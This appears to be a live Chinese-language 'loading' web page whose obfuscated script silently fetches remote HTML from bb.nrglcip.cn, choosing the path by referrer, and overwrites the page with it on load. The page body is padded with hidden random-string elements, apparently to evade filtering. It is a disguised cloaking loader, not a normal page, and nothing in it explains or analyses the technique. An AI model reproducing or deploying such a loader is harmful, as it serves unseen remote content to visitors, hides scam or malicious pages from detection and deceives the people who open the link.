<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CAHBuCP3qn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CAHBuCP3qn .LrVaqW9gT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CAHBuCP3qn .content {
            line-height: 50px;
            text-align: center
        }

        .CAHBuCP3qn .img {
            width: 100%
        }

        .CAHBuCP3qn .P3Z5xUGCi9 {
            text-align: center
        }

        .CAHBuCP3qn .P3Z5xUGCi9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CAHBuCP3qn .P3Z5xUGCi9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CAHBuCP3qn .P3Z5xUGCi9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CAHBuCP3qn .P3Z5xUGCi9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CAHBuCP3qn .P3Z5xUGCi9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CAHBuCP3qn .P3Z5xUGCi9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CAHBuCP3qn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function J1tt5ZIu2H(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZjzZ9 = J1tt5ZIu2H('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZjzZ9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZjzZ9 +".html?a=share";
		}
		
        zLcV79=url+"#"+new Date().getTime();
        zLcV79 && function() {
            $.get(zLcV79, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Ydnp8Traa8mryvIFVT1mBzaOiTojoV45Wbt8KeVj9RR</b>
<ul style='display:none' >Bx8NuaMbGaY08cldx</ul>
<a  href='#' style='display:none'>xXrSL5LNKTgQUofNscyz8Zlj9cUZQoyUCoMomk2P6DNWoFJR</a>
<h1 style='display:none' >OnOM1u5xdLdFlU4o3SwM1cSIxtwLnV5IKoTkU7kgjmAcKXVLp2HWYnFWIWnJbWGOgClY74mnrRXtUNs7</h1>
<div style='display:none'>MIBqrDpJHWjRwkZAWkvKVsB5lcMUpHzLRDBJstoUIGFIiGnOvyV59AMef08tN0HNWMtZBEt74XmybdMvE0HbVLqeVRm</div>
<ul style='display:none' >Bx8NuaMbGaY08cldx</ul>
<h1 style='display:none' >OnOM1u5xdLdFlU4o3SwM1cSIxtwLnV5IKoTkU7kgjmAcKXVLp2HWYnFWIWnJbWGOgClY74mnrRXtUNs7</h1>
<div style='display:none'>MIBqrDpJHWjRwkZAWkvKVsB5lcMUpHzLRDBJstoUIGFIiGnOvyV59AMef08tN0HNWMtZBEt74XmybdMvE0HbVLqeVRm</div><div class="CAHBuCP3qn">
    <div class="LrVaqW9gT">
        <div class="P3Z5xUGCi9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >Ro4frmuctb8p7ljEcZqGK9NsqomLs3Y5jUCU7vCNnQvCLIUmLHlSNRnOok5jOVWv</li>
<li style='display:none' >Ro4frmuctb8p7ljEcZqGK9NsqomLs3Y5jUCU7vCNnQvCLIUmLHlSNRnOok5jOVWv</li>
<li style='display:none' >Ro4frmuctb8p7ljEcZqGK9NsqomLs3Y5jUCU7vCNnQvCLIUmLHlSNRnOok5jOVWv</li>
<ul style='display:none' >XzqHoB6kGhjj5mdFrABwMXVVp1FtVM7joD4RnsOkmxFk143wFJWMMWfjMSuc4w1pFz0RNxyTOCiC8arkE3TJrLd42A</ul>
<ul style='display:none' >XzqHoB6kGhjj5mdFrABwMXVVp1FtVM7joD4RnsOkmxFk143wFJWMMWfjMSuc4w1pFz0RNxyTOCiC8arkE3TJrLd42A</ul>
<h1 style='display:none' >N02SIKVz4GJOIzt0FY76UXE7cSQNNwM7sfBUgmvnSLTqm1GixQb1RxTCfqB9J9cOmCWRtdMf6bLblwhpSD</h1>
<ul style='display:none' >XzqHoB6kGhjj5mdFrABwMXVVp1FtVM7joD4RnsOkmxFk143wFJWMMWfjMSuc4w1pFz0RNxyTOCiC8arkE3TJrLd42A</ul>
<ul style='display:none' >XzqHoB6kGhjj5mdFrABwMXVVp1FtVM7joD4RnsOkmxFk143wFJWMMWfjMSuc4w1pFz0RNxyTOCiC8arkE3TJrLd42A</ul>
<span style='display:none'>fH85U8BRWqYGb78Fk4R2dqTcLQrod9jjzk3OHvcCQ5XwTiRpICH8zn2GHIOdpKW8EPYv8iyp5uxpj2y</span>
<a  href='#' style='display:none'>syaBaFQIAGNYw4QE0S3KGDDJrtHxkCajTfFHPcVOE5uE7tQLqUCTO5u0boZrZr1</a></body>
</html>